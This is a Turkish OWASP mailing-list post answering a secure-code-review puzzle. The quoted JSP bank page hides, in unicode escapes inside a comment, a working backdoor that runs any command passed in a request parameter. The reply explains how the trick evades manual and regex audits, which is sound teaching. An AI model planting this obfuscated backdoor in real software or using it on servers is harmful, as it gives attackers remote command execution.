[Owasp-turkey] Arızayı Bul #4

Bedirhan Urgun bedirhanurgun at gmail.com
Tue Oct 20 11:38:07 EDT 2009


digerlerine daha gore daha ilgi ceker dedim ama...  :)) cekmedi

cevap "herkes developer'lara guveniyor ama uretimin canina okuyabilirler"
mantigi ile yazilmis bir backdoor. Java belirli bir formatta (\uxxxx)
unicode karakterler ile kod yazilmasina imkan taniyor. Yani butun
identifier, keyword, operator v.b.'lerin ascii olmasina gerek yok. (C# icin
ise boyle bir kisitlama var yani keyword ve operator'ler icin mesela sadece
ascii karakterler kullanilabiliyor.). Kisacasi verdigim JSP icerisindeki
unicode formatinda yazilan bolumu, basina ve sonuna ' karakteri koyduktan
sonra

http://www.webguvenligi.org/ipacker/ipacker.html

uygulamasinin INPUT bolumune koyup EVAL TO OUTPUT butonuna basarsaniz,
aslinda developer'in nasil bir backdoor yazdigini gorebilirsiniz. Ortaya
cikan parca, multiline comment bolumunu kapatip, asil backdoor kodunu yazip,
daha sonra tekrar multiline comment bolumunu aciyor (ki "syntax error"
almayalim, ayni sqli, ldapi gibi).

Bu sekilde ciplak gozle bakan veya regex ile audit yapmaya calisan bir
denetimcinin isi zorlasiyor.

bedirhan

18 Ekim 2009 21:05 tarihinde Bedirhan Urgun <bedirhanurgun at gmail.com> yazdı:

>
> Bu kez eglenceli bir ariza var :) Ise farkli bir perspektiften bakmayi
> gerektiriyor. Bir JSP sayfasi...
>
> bedirhan
>
> Arizayi Bul #4
> --------------------
>
> <%@page <%25 at page> contentType="text/html" pageEncoding="UTF-8"%>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>    "http://www.w3.org/TR/html4/loose.dtd">
> <html>
>     <head>
>         <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
>         <title>BankHorizon Welcome Page</title>
>         <link rel="stylesheet" type="text/css" href="style.css" />
>     </head>
>     <body>
>         <% /* Include the header page */ %>
>         <jsp:include page="header.jsp" />
>         <% /* Include the menu page */ %>
>         <jsp:include page="menu.jsp" />
>         <% /* Include the footer menu left page */ %>
>         <jsp:include page="footer_menu_left.jsp" />
>         <h2></h2>
>         <jsp:include page="data_validation.jsp" />
>         <%
>             /************************************COMMENT
> BEGIN**************************************
>            This is unicode that will be used for data validation
>
> \u002a\u002f\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u003d\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0061\u0072\u006b\u0061\u006b\u0061\u0070\u0069\u0022\u0029\u003b\u0020\u0069\u0066\u0020\u0028\u0020\u0073\u0021\u003d\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0073\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0020\u0022\u0061\u0063\u0069\u006b\u0022\u0020\u0029\u0020\u0029\u0020\u007b\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0020\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0020\u0022\u006b\u006f\u006d\u0075\u0074\u0022\u0020\u0029\u0020\u0029\u003b\u0020\u007d\u002f\u002a
>             *************************************COMMENT
> END***********************************/
>             String lang = request.getParameter("language");
>             // use the unicode above to validate the data
>             validateUnicode(lang);
>         %>
>         <br/>
>         <% /* Include the footer bottom page */ %>
>         <jsp:include page="footer_bottom.jsp" />
>     </body>
> </html>
>



-- 
Bedirhan Urgun
http://www.webguvenligi.org
http://www.owasp.org/index.php/Turkey

Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
https://lists.owasp.org/mailman/listinfo/owasp-turkey
-------------- sonraki bölüm --------------
Bir HTML eklentisi temizlendi...
URL: https://lists.owasp.org/pipermail/owasp-turkey/attachments/20091020/a678bcf7/attachment.html 


More information about the Owasp-turkey mailing list